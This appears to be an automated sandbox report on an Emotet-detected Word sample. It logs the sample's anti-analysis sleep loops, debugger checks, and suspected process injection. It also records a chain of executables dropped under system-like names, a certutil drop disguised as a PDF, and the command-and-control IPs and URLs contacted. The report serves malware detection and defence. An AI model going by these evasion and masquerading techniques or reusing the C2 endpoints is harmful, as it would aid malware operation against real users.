Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: sample1.doc Stream path 'Data' entropy: 7.97862280177 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to enumerate running services
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: ChangeServiceConfig2W,OpenServiceW,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 8_2_00645040
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 9_2_003F5040
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 10_2_003F5040
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 11_2_00335040
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 12_2_004F5040
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 13_2_00295040
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 14_2_01C65040
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 15_2_003F5040
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Window / User API: threadDelayed 9764
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Window / User API: threadDelayed 9750
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Window / User API: threadDelayed 9710
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Window / User API: threadDelayed 401
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Window / User API: threadDelayed 9599
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Window / User API: threadDelayed 9865
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Window / User API: threadDelayed 9742
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Window / User API: threadDelayed 9919
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Window / User API: threadDelayed 9476
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Window / User API: threadDelayed 9833
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\certutil.exe Dropped PE file which has not been started: C:\Users\Public\Ksh1.pdf
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe TID: 2488 Thread sleep count: 250 > 30
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe TID: 2488 Thread sleep count: 9750 > 30
Source: C:\Windows\SysWOW64\clip\mmcshext.exe TID: 1784 Thread sleep count: 290 > 30
Source: C:\Windows\SysWOW64\clip\mmcshext.exe TID: 1784 Thread sleep count: 9710 > 30
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe TID: 2648 Thread sleep count: 401 > 30
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe TID: 2648 Thread sleep count: 9599 > 30
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe TID: 3020 Thread sleep count: 135 > 30
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe TID: 3020 Thread sleep count: 9865 > 30
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe TID: 2812 Thread sleep count: 9742 > 30
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe TID: 2812 Thread sleep count: 258 > 30
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe TID: 2836 Thread sleep count: 9919 > 30
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe TID: 2836 Thread sleep count: 81 > 30
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 2632 Thread sleep count: 9476 > 30
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 2632 Thread sleep count: 237 > 30
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 1068 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe TID: 1572 Thread sleep count: 167 > 30
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe TID: 1572 Thread sleep count: 9833 > 30
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\clip\mmcshext.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_006438F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 8_2_006438F0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 9_2_003F38F0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: 10_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 10_2_003F38F0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: 11_2_003338F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 11_2_003338F0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: 12_2_004F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 12_2_004F38F0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: 13_2_002938F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 13_2_002938F0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: 14_2_01C638F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 14_2_01C638F0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: 15_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 15_2_003F38F0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_004738F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose, 16_2_004738F0
Source: dhcpcmonitor.exe, 0000000C.00000002.2273855343.000000000030F000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: dhcpcmonitor.exe, 0000000C.00000002.2273855343.000000000030F000.00000004.00000020.sdmp Binary or memory string: PPTP00VMware_S
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00644DF0 mov eax, dword ptr fs:[00000030h] 8_2_00644DF0
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00643F00 mov eax, dword ptr fs:[00000030h] 8_2_00643F00
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003F3F00 mov eax, dword ptr fs:[00000030h] 9_2_003F3F00
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: 9_2_003F4DF0 mov eax, dword ptr fs:[00000030h] 9_2_003F4DF0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: 10_2_003F3F00 mov eax, dword ptr fs:[00000030h] 10_2_003F3F00
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: 10_2_003F4DF0 mov eax, dword ptr fs:[00000030h] 10_2_003F4DF0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: 11_2_00333F00 mov eax, dword ptr fs:[00000030h] 11_2_00333F00
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: 11_2_00334DF0 mov eax, dword ptr fs:[00000030h] 11_2_00334DF0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: 12_2_004F3F00 mov eax, dword ptr fs:[00000030h] 12_2_004F3F00
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: 12_2_004F4DF0 mov eax, dword ptr fs:[00000030h] 12_2_004F4DF0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: 13_2_00293F00 mov eax, dword ptr fs:[00000030h] 13_2_00293F00
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: 13_2_00294DF0 mov eax, dword ptr fs:[00000030h] 13_2_00294DF0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: 14_2_01C64DF0 mov eax, dword ptr fs:[00000030h] 14_2_01C64DF0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: 14_2_01C63F00 mov eax, dword ptr fs:[00000030h] 14_2_01C63F00
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: 15_2_003F3F00 mov eax, dword ptr fs:[00000030h] 15_2_003F3F00
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: 15_2_003F4DF0 mov eax, dword ptr fs:[00000030h] 15_2_003F4DF0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_00473F00 mov eax, dword ptr fs:[00000030h] 16_2_00473F00
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_00474DF0 mov eax, dword ptr fs:[00000030h] 16_2_00474DF0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00649860 GetModuleFileNameW,SHGetFolderPathW,SHGetFolderPathW,OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,SHGetFolderPathW,SHGetFolderPathW, 8_2_00649860

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_006480A0 SetFileInformationByHandle,GetSystemTimeAsFileTime,_snwprintf,GetProcessHeap,HeapFree,CreateFileW,CreateFileW,CloseHandle, 8_2_006480A0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_004753D0 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo, 16_2_004753D0
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet
Behavior Graph (ID: 425356, Sample: sample1.bin, Startdate: 27/05/2021, Architecture: WINDOWS, Score: 100)

Top-level processes: WINWORD.EXE, certutil.exe (drops C:\Users\Public\Ksh1.pdf, PE32, to the user root directory), tmp_e473b4.exe, svchost.exe.
Process chain: tmp_e473b4.exe -> normaliz.exe -> mmcshext.exe -> ir50_qcx.exe -> dhcpcmonitor.exe -> adsmsext.exe -> TSChannel.exe -> qdvd.exe -> msvcp120_clr0400.exe; each stage drops an executable to the windows directory (C:\Windows), starts it, and hides that the file was downloaded from the Internet (zone.identifier).
Network: msvcp120_clr0400.exe contacts 177.130.51.198:80 (WspServicosdeTelecomunicacoesLtdaBR, Brazil) and 91.121.87.90:8080 (OVHFR, France); 110.37.224.243 and 58.27.215.3 (WATEEN-IMS-PK-AS-AP, Pakistan) and 96 other IPs or domains were also contacted.
Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 11 other signatures.

Contacted Public IPs


Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://91.121.87.90:8080/KFDwQljVkxD3/OOFcmzcP5LKdqC/7kx60YXntHFlDt/5Rmtlx5Mir4E2nTGMFj/vs6RDbQfHrygTYrI/ | true | Avira URL Cloud: safe | unknown
http://177.130.51.198/43z7rPqPirmV4qB/AthcoPDmU/Q4ILc7kQKSHycUR/pIpU/8iSRPWx/wgrz9ygVvehFY9FxG0/ | true | Avira URL Cloud: safe | unknown